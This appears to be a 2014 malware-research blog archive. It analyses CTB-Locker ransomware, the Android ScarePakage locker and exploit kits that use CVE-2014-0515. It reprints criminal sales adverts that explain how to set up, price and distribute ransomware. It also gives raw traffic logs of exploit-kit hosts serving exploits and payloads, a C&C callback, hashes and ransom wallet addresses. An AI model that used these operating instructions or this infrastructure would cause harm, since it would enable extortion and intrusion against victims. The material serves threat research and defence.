• Возможна оплата с другого комьютера. Коды для оплаты относительно короткие (около 150 символов), их можно переписать на бумажку. Аналоги оффлайн-оплаты не предоставляют, либо она не такая простая.

• Установка и автонастройка всего сервера с нуля за одну минуту с помощью инсталлятора! После запуска сервер не требуется администрировать.

• Встроенная поддержка партнерских схем.

• Размер локера менее 700кб включая все библиотеки и графику. Ничего не подгружается.

CTB - Сокращение от ключевых достоинств - Curve-Tor-Bitcoin

По запросу:

• Подключение обменников в интерфейс оплаты.

• Замена текстов и графики в интерфейсе локера, адаптации под разные языки (сейчас локер только на английском).

Схема работы локера:

• 1. Запуск ЕХЕ на машине юзера. Достаточно прав юзера.

• 2. Генерация случайного ключа шифрования. На машине и в оперативной памяти хранится только публичный ключ. Расшифровать с его помощью файлы нельзя.

• 3. Шифруются все доступные файлы с заданными расширениями. Проверяются все жесткие и съемные диски, все сетевые шары.

• 4. При перезагрузке операция продолжается с последнего файла.

• 5. После обработки всех файлов выводится окно юзеру с описанием его проблемы и схемы оплаты.

• 6. Производится запрос на сервер и передачу зашифрованного ключа. Либо сообщение юзеру адреса сервера и специального кода, по которому он может произвести оплату вручную.

• 7. Сервер в ответ генерирует Bitcoin-адрес, на который надо произвести оплату. Для каждого юзера адрес уникальный и отслеживание факта оплаты происходит именно по этому адресу.

• 8. Сервер мониторит транзакции bitcoin на предмет поступления денег на счет. Как только транзакция полностью прошла, то боту вычисляется и сообщается секретный ключ. Если был ручной ввод кода, то юзеру отдается небольшой ехе-декриптор с зашитым ключом, которым он может починить только свой комп. Размер декриптора 30кб, он не создаст нагрузку на канал серера и TOR-узлов.

• 9. Бот расшифровывает все файлы и самоудаляется.

• 10. Деньги с локального кошелька после проверки транзакции выводятся на основной bitcoin-адрес. В случае утраты сервера деньги не потеряются.

Прибыль от локера напрямую зависит от качества трафика. Вы можете выставить произвольную цену на анлок в зависимости от региона вашего трафика.

Для US,CA и EU рекомендованная цена 0.5 BTC ($320), для других регионов 0.25 BTC ($160).

Как установить и начать работу с локером.

• 1. Установить VDS с Windows 7/2003/2008/2012. Не менее 30Гб свободного места. Рекомендоманный диск с учетом самой ОС - 60-100Гб, по памяти и процессору высоких требований нет.

• 2. Запустить инсталлятор. Указать папку установки и базовую цену. Инсталлятор сам установит bitcoin, tor и собственный сервер. В процессе установки сгенерирует все ключи, домены, адреса, настроит все ПО.

• 3. После завершения установки вы получитие полностью рабочий сервер и в нужной папке появится билдер. С его помощью создаются экземпляры локера с зашитыми номером партнера, публичным ключом сервера и его адресом. Обратите внимание, что начальная синхронизация bitcoin может занять до суток времени. До окончания синхронизации не будет видно транзакций на оплату. Все остальное будет работать.

• 4. Готовый экземпляр локера можно криптовать и распространять.

• 5. Сервер пишет логи с информацией по инсталлам и оплатам, их можно пропарсить и вычислить выплаты партнерам. Следует помнить, что первый отстук происходит при завершении шифрования. Поэтому он может запаздывать от инсталла на несколько часов. Фейковые инсталлы (например, откат системы после установки или многократный инсталл на одну машину) не будут генерить отстук. Возможен отстук по инсталлу на сервер заказчика для учета трафика (может снизить пробив).

Цена локера составляет $3000 и включает месяц бесплатной поддержки.

Продление поддержки стоит всего $300 в месяц. Вы можете свободно пользоваться системой после окончания поддержки, запускать новые сервера, генерировать локеры. Вы будете только ограничены в обновлениях.

За сумму в $3000 получаете готовую систему "под ключ", она не требует настройки и доработки. Вам не надо никому ничего отчислять, она персонально ваша. Вы можете запускать множество различных серверов и локеров.

Вы можете запускать загрузки сразу после установки.

Возможна партнерская схема без крупных вложений. Обращайтесь в jabber, обсудим.

Акция в честь открытия сервиса.

Первый покупатель покупает локер c 50% скидкой всего за $1500.

По акции обазятельна длительная регистрация на форуме и размещение отзыва.

Порядок покупки.

• 1. Отписаться в jabber. OTR обязателен.

• 2. Согласовать гаранта или escrow-сервис.

• 3. Сообщить свой bitcoin-адрес. Сгенерируйте адрес в чистом кошельке на отдельной машине, чтобы его нельзя было связать с вашими предыдущими транзакциями. Этот адрес будет прошит в сервер как получателя всех заработанных денег. Как покупатель вы сможете ставить сервер неограниченное количество раз с разными ключами и разными доменами, но выводить деньги можете только на один адрес. Не приобретайте продукт у левых людей, ваши деньги будут уходить им.

• 4. Оплатить гаранту стоимость.

• 5. Получить пакет инсталлятора, установить его на VDS Windows 7/2003/2008/2012 и проверить работу всей системы в течение 72 часов. Не запускайте локер на сервере!

• 6. Локер можно проверять локально на виртуалке, либо начать прогруз сразу. Для загрузок обязателен FUD крипт на любом сервисе.

• 7. Сообщить гаранту об успешной проверке.

Скрины:

jabber: tapkin@jabbim.cz

------------------------------------------

Translated by google as :

------------------------------------------

CTB-Locker, Kriptoloker new generation

Pros:

• Persistent cryptography based on elliptic curves. Decrypt files without payment impossible. Equivalent resistance RSA-3072, exceeding all analogs. At the same encryption speed is much higher.

• All keys are disposable and make them into the impossible. Keys are totally random, collisions are impossible. Do analogues locker keys or sewn into the server, they can collect.

• Placing a server in onion-domain (TOR), close to domain abuse can not be practically impossible to trace the owner and shut down the server.

• Connection to the server only after encryption of all files. Early Detection is not possible on the traffic, it is impossible to block the work of the locker. Blocking TOR prevents only payment the user, not the program. Analogs are connected to the server until the crypt and can block.

• Payment in BTC. Purse impossible to block and remove. Money is not stored on the server. The loss of the server does not lead to loss of money.

• You can pay with another Computer literacy. Codes to pay relatively short (about 150 characters), they can be rewritten on paper. Analogs offline payments do not offer, or it is not so simple.

• Installation and auto-tuning the entire server from scratch in one minute with an installer! After starting the server does not want to administer.

• Integrated support for partnership arrangements.

• The size of the locker least 700kb including all libraries and graphics. Nothing loaded.

CTB - Reduction of the key advantages - Curve-Tor-Bitcoin

On request:

• Connecting exchangers in payment interface.

• Replacement of text and graphics interface locker, adaptation to different languages (now locker in English only).

Scheme of locker:

• 1. Run EXE on the machine user. Sufficient human user.

• 2. Randomly generated encryption key. On the machine and stored in RAM only the public key. Decrypt files using it impossible.

• 3. Encrypts all available files with the specified extensions. Scan all hard and removable drives, network all the balls.

• 4. When you restart operation continues from the last file.

• 5. After processing all files dialog box is displayed to the user with a description of the problem and its payment scheme.

• 6. Request to the server and transmitting the encrypted key. Message to the user or server address and a special code that you can pay for it manually.

• 7. Server in response generates Bitcoin-address to which we must pay. For each user a unique address and tracking is precisely the fact of payment at this address.

• 8. Bitcoin transaction monitor server for receiving the money in the account. Once the transaction has completely passed, the bot is calculated and reported to the secret key. If you have to manually enter the code, then the user is given a small exe-wired key decryptor with which he can only fix your PC. Size 30kb decryptor, it will not create a burden on the channel Serer and TOR-nodes.

• 9. Boat decrypts all files and deletes itself.

• 10. Money from the local purse after checking transactions are displayed on the main bitcoin-address. In case of loss of the server will not lose money.

Profit from the locker depends on the quality of traffic. You can set an arbitrary price for unlock depending on the region of your traffic.

For US, CA and EU recommended price 0.5 BTC ($ 320), for other regions 0.25 BTC ($ 160).

How to install and start working with the locker.

• 1. Install VDS with Windows 7/2003/2008/2012. At least 30GB of free space. Rekomendomanny disk considering the OS - 60-100GB, memory and processor requirements not high.

• 2. Run the installer. Specify the installation directory and the base price. The installer will install bitcoin, tor and own server. The installation process will generate all the keys, domains, addresses, configures all software.

• 3. After installation is complete, you poluchitie server fully working and in the correct folder appears builder. With it instantiates the locker room with sewn partner, the public key of the server and its address. Note that the initial synchronization may take up to bitcoin days time. Before sync will not be seen for payment transactions. Everything else will work.

• 4. Ready locker can copy and distribute kriptovat.

• 5. Server writes log information installs and pay, they can parse and calculate payments to partners. It should be remembered that the first otstuk occurs at the completion of encryption. Therefore, it can be delayed by a few hours installs. Feykovye installs (such as the rollback system after installation or multiple installs on the same machine) is not longer generate otstuk. Chance otstuk installs on the server for customer traffic accounting (can reduce the sample).

Price locker is $ 3,000 a month and includes free support.

Extending support costs only $ 300 per month. You can freely use the system after the end of support to launch new server generate lockers. You will only be limited in future updates.

For the sum of $ 3000 get ready system "turnkey", it does not require adjustment and refinement. You do not have anything to anybody to deduct it personally yours. You can run many different servers and lockers.

You can start downloading immediately after installation.

Can affiliate scheme without major investments. Contact jabber, discuss.

Rally in honor of the opening of the service.

The first buyer buys locker c 50% discount for just $ 1,500.

On shares obazyatelna long registration on the forum and accommodation reviews.

Order of purchase.

• 1. Unsubscribe to jabber. OTR required.

• 2. Guarantor or an escrow-service.

• 3. Inform your bitcoin-address. Generate address in pure purse on a separate machine, so it can not be attributed to your previous transactions. This address will be sewn into the server as a recipient of all money earned. As a buyer, you can put the server unlimited number of times with different keys and different domains, but can withdraw money only to a single address. Do not purchase a product from people left, your money will go to them.

• 4. Payment Guarantees worth.

• 5. Get installer package, install it on VDS Windows 7/2003/2008/2012 to check the entire system for 72 hours. Do not run on the server locker!

• 6. Locker can be checked locally on virtualke or progruz start immediately. To download required FUD crypt on any service.

• 7. Report guarantor of a successful test.

screens:

jabber: tapkin@jabbim.cz

------------------------------------------

He later mentioned :

------------------------------------------

27.06.2014 в 23:59 UTC продажи локера будут прекращены.Все кто кукил или купит локер будут получать обновления. Новые клиенты смогут только войти в партнерку.

------------------------------------------

Google translate this as :

------------------------------------------

06/27/2014 at 23:59 UTC sale locker will prekrascheny .Vse kukil who buys or locker will receive updates. New customers will only be able to enter the affiliate.

------------------------------------------

There are multiple instances in the wild. As advertised, some show two languages some show only English.

Here you can see it dropped as Second stage after Angler EK payload :

Critroni delivered as Second Stage - 2014-07-18

Angler EK payload : Spambot it seems.
079bf937d5020ca77ff97a5318414f07
2nd Stage Payload : Critroni.A
e89f09fdded777ceba6412d55ce9d3bc

As advertised, encryption occurs without any connection.

Encrypted documents
ctbl extension

Some file access captured by cuckoo :

Critroni blindly try to open all mounted drives

CTB Locker/Critroni - Start (English)
(we can see the changed wallpaper in background)

The view button show you this :

Ctbl - List of encrypted document

CTB Locker/Critroni - Start (Russian)
(we can see the wallpaper in background)

CTB Locker/Critroni - Connecting (English)

CTB Locker/Critroni - Connecting (Russian)

Connexion Failed : Offline mode available.

Critroni - Offline Mode.

CTB Locker - Payment
1PAVxqYtWD1RBAjE5voSDnUSefGGUvCwpm

CTB locker Payment (a little more expensive)
12UrsknT8hqYGpi8NToS2GWCWaLKtR2UXn
(it's in fact > 200$)

On the one from today as Second stage of an Angler EK, we can see that the BTW to USD convertion is not ok.

0.04 BTW is in fact near 30usd
1N3qTaZsUqU2owUVjmijVyHB4uiid2JoXd

CTB locker (Payment in Russian)

If you don't have bitcoins :

CTB Locker - Exchange

The russian one is slightly different :

CTB Locker - Exchange (Russian)

When you click on Open List :

wiki page from en.bitcoin.it is opened.

Time Expired ?

Time Expired....one last chance.

In "my Documents"

Added in my Documents by Critroni.A
The wallpaper, the DecryptAll and list of encrypted documents

Wallpaper of one Critroni/CTB locker

html file stored in my documents
(the one we see when we select view on first screen)

Decrypt All

On tor

On tor after adding the public key :
1JXMiCkbrPiDWxoZ8oJ9yQZutHoaGQtXCF

Still in the time period. Offline (convertion rate is ok on Web UI, was not on the locker) for that one
12UrsknT8hqYGpi8NToS2GWCWaLKtR2UXn

It seems to be a strong, well thought piece of malware.

Files: Critroni_2014-07-18

↧

A ScarePakage variant is targeting more countries : impersonating Europol and AFP

August 6, 2014, 11:43 am

≫ Next: CVE-2014-0515 (Flash 13.0.0.182 and earlier) integrating Exploit Kits

≪ Previous: "Crypto Ransomware" CTB-Locker (Critroni.A) on the rise

(image from GadgetMaxim.com

On July 16th Lookout wrote about a new "police ransomware" on Android. They named it ScarePakage. (aliases : Eset:Android/Locker.B , Kaspersky:Trojan-Ransom.AndroidOS.Aples.a)

It (or a variant ? seems Norton focused here) is advertised on underground since beginning of July as "Android Locker" by the seller of a fork of Titan Browlock System.

ScarePakage advertised as "Android Locker" on underground - 2014-07-06

Original text of the advert :

------------------------------------------

Android Locker, андройд локер

Из функционала:
- эмитация сканера нелегального контента (Hello Nortan!)
- "жесткая"установка, невозможно удалить приложение даже через безоп. режим
- блокирует любые действия/приложения/активность юзера
- шифрование/дешифрование файлов на флешке, если она имеется в устройстве
- "прослушивание"всех доступных сигналов на устройстве, перехват и старт приложения по каждому из них
- попытка "убить"любой процесс при старте
- работает после ребута
- есть возможность разблокировки либо постоянной блокировки девайса после ввода ваучера
- удобная админ панель
- web лендинг в комплекте

Основная цель - получение Moneypak чеков, софт заточен под US андройд трафик,
под другие страны приложение не адаптировано.

Скрины

Важно: я не не криптую апк файлы и сорцы не продаю.
Я в праве отказать в продаже без объяснения причины.
Ребилд на другой домен бесплатный, если ваш прежний домен спалился.
Приложение апк не даю на тест (точнее даю, но не всем подряд) - полно любителей энтузиастов.
Оплата строго через гарант или предоплата.

Цена 2000$ без торга
После покупки вы получаете web лендинг и апк файл.
Вам останется

только запустить траф и ждать чеки.

knsant@exploit.im - OTR

------------------------------------------

Translated by Google as :

------------------------------------------

Android Locker, андройд локер

We developed our own product androyd locker.

Of the functional:

- Emitatsii scanner illegal content (Hello Nortan!)

- "Hard" setting, you can not remove the application even after bezop. mode

- Blocks any action / application / user activity

- Encryption / decryption of files on a flash drive, if available in your device

- "Listening" all available signals on a device to intercept and start the application on each of them

- An attempt to "kill" any process at startup

- Working after reboot

- Have the ability to unlock or lock devaysa constant after entering the voucher

- Comfortable admin panel

- Web Landing complete

The main goal - getting Moneypak checks, soft ground under US androyd traffic

for other countries the application is not adapted.

screens

user posted image

Important: I do not not crypto apk file and sortsy not sell.

I'm right to refuse sale without explanation.

Rebuild to another domain for free, if your old domain bedrooms.

Appendix ank not give a test (or rather to give, but not all in a row) - fully lovers enthusiasts.

Payment is strictly through a guarantee or prepayment.

Price $ 2000 without bargaining

After purchase you get web Landing and apk file.

You just need to run and wait for traf checks.

knsant@exploit.im - OTR

------------------------------------------

Later Updates : Seller provided some numbers :
------------------------------------------
Умеете добывать андройд трафик?
Приглашаю несколько человек посотрудничать с нашим софтом.
Конверт жгет.

Примерные показатили конверта:

Download apk: 89690
Launch apk: 1379
All vouchers: 76
Valid vouchers: 54

~9к$

Принимает от 50к трафика в сутки.
------------------------------------------
Able to produce androyd traffic?
Invite several people to collaborate with our software.
Zhget envelope.

Exemplary indicators envelope:

Download apk: 89690
Launch apk: 1379
All vouchers: 76
Valid vouchers: 54

~ $ 9k

Receives from 50k daily traffic.
------------------------------------------

And on the 16th he wrote about new countries targeted.

knstant announcing DE, ES, FR and AU design were now available
2014-07-16

------------------------------------------

I spotted a "badvert" yesterday on Spankwire (big (alexa 500 US, 800 worldwide) porn site) that was redirecting to a Browlock hidden behind cloudflare (after a jump on a keitaro TDS on 94.102.48.63)

new Browlock on @youporn network - thanks to @kafeine for the info #malware #malvertising #infosec pic.twitter.com/C8rfi5Y86E
— Malekal's site (@malekal_morte) August 6, 2014

The Browlock was showing the exact same design than the one featured in that post : Titan Browlock System so also advertised by konstant.

Landing on this badvert with android from at least FR, ES and DE would prompt you with a virus alert (hidden behind cloudflare)

Popup alert you could get while browsing Spankwire
with an Android Powered device && Chrome Browser from France

Then a file named Norton_Internet_Security.apk is downloaded.

Launching it :

Impersonates Norton Internet Security

On launch : fake Scan

After fake Scan trying to get "Administrator of the device" rights
(US version)

I spotted 5 different APK on the server (which perfectly match what we saw in the advert):
AU - d6c6bc0dc803f7891b9db745c24de541
DE - 06c7a02d49b97930fb9c696cde1350d1
ES - d21e1c0f992ed70c6881c1f31c7a555a
FR - e13523d97e2390ca4529abf06ebe01ee
US - 28726f772f6b4b63fb40696a28afafc9

One country one apk...the coder should really take a look at : "Localizing with Resources"

ScarePakage - DE - 2014-08-05

ScarePakage - FR - 2014-08-05

ScarePakage - ES - 2014-08-05

ScarePakage - AU - 2014-08-05

ScarePakage - US - 2014-08-05

The locking feature is working far better than in Koler.

C&C

verify-terms\.com/admcp/api.php
(cloudflared ... )

Sharing Infra with the Titan Browlock.

Files : ScarePakage_2014-08-06.zip (5 apk)

Read More:
ScarePakage – Fake FBI RansomLocker - 2014-07-24 - Darien Huss - Emerging Threats
U.S. targeted by coercive mobile ransomware impersonating the FBI - 2014-07-16 - Meghan Kelly - Lookout

↧

CVE-2014-0515 (Flash 13.0.0.182 and earlier) integrating Exploit Kits

June 7, 2014, 2:03 pm

≫ Next: Angler EK : now capable of "fileless" infection (memory malware)

≪ Previous: A ScarePakage variant is targeting more countries : impersonating Europol and AFP

Discovered by Kaspersky in April in watering hole attack, soon after used in operation targeting Banking information in Japan/Korea by Symantec, reached Exploit DB at begining of may, then in malwertising tied to Brazil 2014 by Spiderlabs, the code targeting CVE-2014-0515 (Flash 13.0.0.182 and earlier) has find its way to Exploit Kits. I spotted it the 2014-06-05 in CottonCastle (blog post coming) exploit kit. Brad spotted it in Flash EK.

CottonCastle EK:

CVE-2014-0515 exploit in CottonCastle 2014-06-05

See Meet CottonCastle EK (confirmation credits for this CVE goes to Timo Hirvonen )

Flash EK: 2014-06-06 (decided to use coder's name)

The Flash EK coder announced the new exploit on underground the 2014-06-05.

"Добавлены новые сплоиты. Существенно поднялся пробив. С нашими впс и доменами - 350 уев в неделю. С вашими - 250. Битки или чек паймер. По английски не понимаю. Траф из СНГ не принимаем."

google translated as:

"Added new sploitov. Risen significantly breaking. With our EPS and domains - uev 350 per week. With your - 250. Chock or check paymer. By not understand English. Cores from the CIS do not accept."

Breaking increased by up to 45% of it's pre-CVE-2014-0515 value.

CVE-2014-0515 as spotted by Brad in Flash EK
2014-06-06

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/allow.php
200 OK (text/html)

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/js/pd.php?id=6376652d323031342d303531352e636f6d (6376652d323031342d303531352e636f6d is the referer in hex)
200 OK (text/html) http://pastebin.com/HdVf799r

Flash part of the JS detect in Flash EK
2014-06-06

POST http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/json.php
200 OK (text/html) http://pastebin.com/uhTTybKH

Post data to json

jspon.php Flash EK 2014-06-06

After unescape and hex2text : http://pastebin.com/4xZRjJLS
And after one more hex2text : http://pastebin.com/0F9Z2tiW

json.php after multiple hex2bin Flash EK 2014-06-06

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/msie.php
200 OK (text/html)

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/flash2014.php
200 OK (text/html) http://pastebin.com/mqXeun1g

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/flash0515.php
200 OK (text/html) http://pastebin.com/L6NYY0iW

After some deobfuscation (unescape, hex2text) : http://pastebin.com/TjMyS6YW
After one more hex2text : http://pastebin.com/SVGS4yhD

After 3 hex2text : 0515php in Flash EK 2014-06-06

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/include/4c3ce.swf
200 OK (application/x-shockwave-flash) c49057333ebe34638e7908b43bd23f6c

CVE-2014-0515 DoSWF protected. (won't try to go further)

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/include/4c3ce.swf
200 OK (application/x-shockwave-flash)

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/loadfla0515.php?id=4
200 OK (application/octet-stream) bde9e91d8a9e19a45c9ebd44393c0194 Glupteba (Thanks Marc-Étienne Léveillé from Eset for identification. MS flagging it as Carberp made me wonder)

Files : 2014-06-06_CVE-2014-0515.zip
You'll find Pcap and additional Data on MalwareTrafficAnalysis

Sweet Orange :
Spotted by Brad on the 12th

CVE-2014-0515 successful pass in Sweet Orange

GET http://img.blueprint-legal .com:16122/systems/mysql/fedora.php?database=3
200 OK (text/html)

GET http://img.blueprint-legal .com:16122/systems/mysql/hxwXHAp
200 OK (application/x-shockwave-flash) 25844d337d3ee13ec411100cb2d2baf1

CVE-2014-0515 in Sweet Orange

GET http://img.lawandmarket .org:16122/cars.php?play=268
200 OK (application/octet-stream) d35d337ff7598bd6dc20c24e3be735bc (Qbot as usual for this user)

Files :Fiddler/Payload/Flash

Nuclear Pack:
2014-06-15
Exploit is inside (for instance : 444d411a353f6bd8209f91555dfd713b ) .

2014-06-18
After multiple try without being infected by this exploit on Flash 13.0.0.182 I finally got a "successful" pass. (Thanks Will Metcalf for Referer)

CVE-2014-0515 positive pass in Nuclear Pack

GET http://f42cb2bfvhf.venueat.gcwsa .org/
200 OK (text/html)

GET http://737570439-1.venueat.gcwsa .org/1403061420.htm
200 OK (text/html)

GET http://737570439-1.venueat.gcwsa .org/1403061420.swf
200 OK (application/x-shockwave-flash) f95006970f34a6ca5bcd0b32b92dd48d

GET http://737570439-1.venueat.gcwsa .org/f/1403061420/7
200 OK (application/octet-stream) aa73557aa6b01045afe1b8b6a4aa0934 (Andromeda v09 rc4: 073e329fc4caff518ffb207eb3ac5859 - calling testotds.mcdir .ru - 91.194.254.180 )

Files : Fiddler/Payload/Flash

Angler EK:
2014-07-03
Modification spotted by EKWatcher. Exploit Identification by Kaspersky.

CVE-2014-0515 successful path in Angler EK
2014-07-03

GET http://reenslavementbuchungsbuero.izyday .com:5900/o0pmoexhbv.php
200 OK (text/html) Landing (Pastebin)

Contains some AV (Kaspersky and TrendMicro) detection :

AV detection
( Function0 http://pastebin.com/hjH8ijuA )

SilverLight /Flash trigger

Moditication spotted by EKWatcher
( Function1 : http://pastebin.com/H2DdDeVf )

And impossible path :

Impossible Path
( Function1 : http://pastebin.com/H2DdDeVf )

[OT] Silverlight Calls : Function2 http://pastebin.com/Vd869rDX [/OT]

Flash Call (function3)

Flash Calls
Function3 http://pastebin.com/maY5Wz1X

[OT]PluginDetect/Java calls : Function 4 http://pastebin.com/VbUsu2pv [/OT]

GET http://reenslavementbuchungsbuero.izyday .com:5900/9C52KmONbd2yuWAu5h6nA_qVLxrslXn927DBuIPEo2Pog7IUkVQt04rmOPmow_rb
200 OK (application/x-shockwave-flash) 85db431821dfec5d5d404b839c98d333

After decryption (Kaspersky's work)

Piece of CVE-2014-0515 in decrypted flash from Angler EK

GET http://reenslavementbuchungsbuero.izyday .com:5900/sVUXbUAgdGMB6xjbl128LfXoLjZ37iyD34sGV24h7-9RKadZHRBKohwCwk5FHCfc
200 OK (application/octet-stream) (Reveton Ransomware)

Files : Fiddler/Flash

Styx : 2014-08-22

Update coming shortly.

Read more :

CVE-2014-0515 exploit from FlashPack EK - Brad - Malware-Traffic-Analysis

CVE-2014-0515 Goes to Brazil for World Cup 2014 - Arseny Levin - SpiderLabs - 2014-06-03
Recent Exploit for Adobe Flash Vulnerability Targeting Users in Japan for Financial Information - Joji Hamada - Symantec - 2014-05-30

Technical Analysis of CVE-2014-0515 Adobe Flash Player Exploit - Matt_Oh - HP - 2014-05-23

Adobe Flash Player Shader Buffer Overflow Exploit - ExploitDB - 2014-05-09
New Flash Player 0-day (CVE-2014-0515) used in watering-hole attacks - Vyacheslav Zakorzhevsky - Kaspersky - 2014-04-28

↧

Angler EK : now capable of "fileless" infection (memory malware)

August 31, 2014, 3:50 am

≫ Next: Say Hello to Astrum EK

≪ Previous: CVE-2014-0515 (Flash 13.0.0.182 and earlier) integrating Exploit Kits

Matrix - Agent Jackson avoiding bullets

(First edition : I asked help to study this - Hopefully, more technical details to come soon)

Few days ago I spotted a new pattern in some Angler EK threads :

New pattern in a Vawtrak Thread from Angler EK
Fired : CVE-2013-2551 - 2014-08-28

New pattern in another Vawtrak Thread from Angler EK
Fired : CVE-2014-0515 - 2014-08-29

GET http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee/count?b=1 HTTP/1.1

Accept: */*

Referer: http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Accept-Encoding: gzip, deflate

Host: rwvs30r2zq.akdnbfb.com

Connection: Keep-Alive

Wondering what it was and going over different infections paths I spotted only one thread without this "new" count?b. [Note : on the 2014-08-31 count?b appeared on that thread too]

Angler EK - 2014-08-28
"Memory Malware" thread

Exploits' hashes were the same as on all other threads but my usual tools were not able to gather the payload and what surprised me more is that HIPS (like Faronics antiexec) were bypassed (note : I tried Malwarebytes AntiExploit and it was able to spot the ROP and Stack pivoting)

I spent some time to figure out what was happening here :

Angler EK is now able to infect an host without writing the malware on the drive (it's injected directly in the process running the exploited plugin)


Angler EK (no landing on this screen, CVE-2014-0515 fired) and Call back from the malware injected in Internet Explorer 2nd Stage drop : 275c5f650261e80d864faf7cc6b70774 injecting itself to explorer and then gathering Necurs on the same C&C (e.g. : be84c4689912d5689283b4b7efcaf8f2 - 2014-08-28 , b0e3e860a2dc62cb40fd6ef897ad592b 2014-08-29 , 5830dfde30873176d05604677bab6bd9 2014-08-30)

Malware call back in https to koqpisea.in :

217.23.3.204

49981 | 217.23.0.0/20 | WORLDSTREAM | NL | WORLDSTREAM.NL | WORLDSTREAM

Call for 2nd Stage payload looks like :

POST https://koqpisea.in/ HTTP/1.1

Host: koqpisea.in

Content-Length: 94

Connection: Keep-Alive

Cache-Control: no-cache

{"protocolVersion":1,"buildId":1049,"id":"35d1754a1c4672f2","tags":[{"type":"dll","64bit":0}]}

This feature opens a wide range of possibilities. Aside being a powerful way to bypass AV, an ideal way for one time stealer or loader (Pony, Jolly Roger, Andromeda, Smoke Bot, etc..), it also allows a detailed check of the infected host before being a little more noisy and writing anything on disk. It makes it also difficult to grab the dropper (you have to get it from the memory or from the recorded traffic then decode it). This is a powerful move for the attack side.

Additionnal illustrations :

Injected plugin-container calling C&C after successful "memory malware" infection
via Silverlight on Firefox and Windows 7
2014-08-30

Image : Courtesy of Will Metcalf from Emerging Threats
Java calling payload then "Memory payload" activity captured by his Cuckoo instance
2014-08-28

Hopefully more to come soon.

Credits: Thanks to Will Metcalf (Emerging Threats) and Mieke Verburgh (Malwarebytes) for help and advices.

Files:
AnglerEK_MM_2014-08-31 (Fiddlers + C&C calls - Owncloud)

If you want to play with Volatility or whatever, here is the memory (Mega) of a VM when IE was injected and calling C&C (IE pid : 860)

Capture of Fiddler just before pausing the VM
2014-08-30

Read More:

The Hunt for Memory Malware - 2013-11-06 - Albert Fruz

In-Memory Execution of an Executable - Amit Malik - SecurityXploded

↧

Say Hello to Astrum EK

September 14, 2014, 1:14 am

≫ Next: CVE-2013-7331 and Exploit Kits

≪ Previous: Angler EK : now capable of "fileless" infection (memory malware)

Artist’s impression shows the structure of the Milky Way
NASA/JPL-Caltech/ESO/R. Hurt

I was chasing something else (the Kovter adfraud's Sweet Orange thread - Kovter is not a ransomware anymore (since at least march 2014)) when I received bullets from an undocumented "weapon" : an exploit kit that seems to be private (for now?) and based on the infection path (between an Adxpansion badvert on a porn website and the https goo.gl link to the landing ) in use by a group that was traffing to Reveton team's EK threads (so via Cool then Angler EK) :

Say Hello to Astrum EK

Astrum EK 2014-09-06 - Real Name (not chosen)
(Fast looking at the URI pattern we may find it a little Angler-ish...but it's not)

Astrum will accept to serve a landing only once per IP and is also denying connection from Tor and (at least) Russia.

The lifetime of the landing seems a little higher than on Angler or Nuclear Pack but where most of the time you need to fake some referer to avoid being rejected, with Astrum : show a referer and you'll get ignored and IP banned. Firefox, Chrome and Opera are also ignored (and i guess that they are filtered out upstream anyway).
A fast search lets think it's in use since at least 2014-08-15

Now let's take a look at the bullets and the ballistic.

CVE-2014-0515 - CVE-2013-0634 (Flash) :

Those days it's the most successful vuln targeted in exploit kits, followed by CVE-2013-2551.

CVE-2014-0515 successful path in Astrum EK
2014-09-06

GET http://static.yarkiy-mir .org/duf5ibqshp.html

200 OK (text/html)

Piece of Astrum's Landing 2014-09-06
http://pastebin.com/Jc5k0kvi
JsBeautified : http://pastebin.com/gvjskkG2

Obfuscation in used as described by EKWatcher
An array of modifed-Base64 strings, that are each XORed with a different byte and then inserted (in random order) into the JS later - The Base64 is using "A-Za-z0-9-:" instead of "A-Za-z0-9+/"

After deobfuscating the "div" value via the function t (using malzilla for instance) we get this :

http://pastebin.com/PfAjuvPR

There are sweet piece of code like those showing they had researcher/bots etc in mind while writing it :

On landing load, script will try to catch debugging tools
(even phantom....)

and also check via loadXML if there are obvious researcher tools launched or if it's running in a VM.

check for Kaspersky BHO

And here is the data that will be posted :

Fast sum-up of the data that will be encoded and posted in next call.
Comment are obviously not in the original code

POST http://static.yarkiy-mir .org/IVmTAccT_rdKYvlrrCSb3UJl-G-gc5uJSzOmaP8jldlPMKNo_iuSh1J_qjr5Ot7fTg..

200 OK (text/html) CVE-2013-2551 and creation of the flash object.

Posted data (as Neutrino was doing) :

http://pastebin.com/raw.php?i=GBHqpM4N

Which before encoding should look like :

Data sent to the Exploit kit on second call

Astrum - 2014-09-06
Piece of the Post Call reply.

The obfuscation in use is the same as in the landing.

Once decoded here is the Flash insertion :

Astrum - Inserting the flash element.
http://pastebin.com/GYehkmaC

GET http://static.yarkiy-mir .org/kZThMKU15rv6r4tazgKD0fKoil7CVYOF-_7UWZ0FjdX__dFZnA2Ki-Ky2AWYHMbT_g..

200 OK (application/x-shockwave-flash) 3fb2c3750d51268781fa608a42c3e4d7 CVE-2014-0515 & CVE-2013-0634 (Thanks to Arseny Levin (Spiderlabs) for the help)

GET http://static.yarkiy-mir .org/CjJXSImjvethCT0i4pTYgWkOPCbuw9jVYFhiIbGT1oVkW2chsJvR23kUbn27ip2DZQ..

200 OK (application/octet-stream) Once Decoded: 9d9eb3ceffd6596ebdf7fc9387cd5cb1 - Reveton

Xored Payload. Key : 98EB68248A2815474CFE8902C0603770

I didn't check that deeply yet, but it seems you will get a unique Xor key for each pass.

CVE-2013-0074/3896 (Silverlight) :

Astrum EK - 2014-09-06
Silverlight Successful path

GET http://asset.yur88 .com/xawufyinv3lqr.html

200 OK (text/html)

To give an idea of the data being sent to the Exploit Kit
on the following post request. (md5 is different)

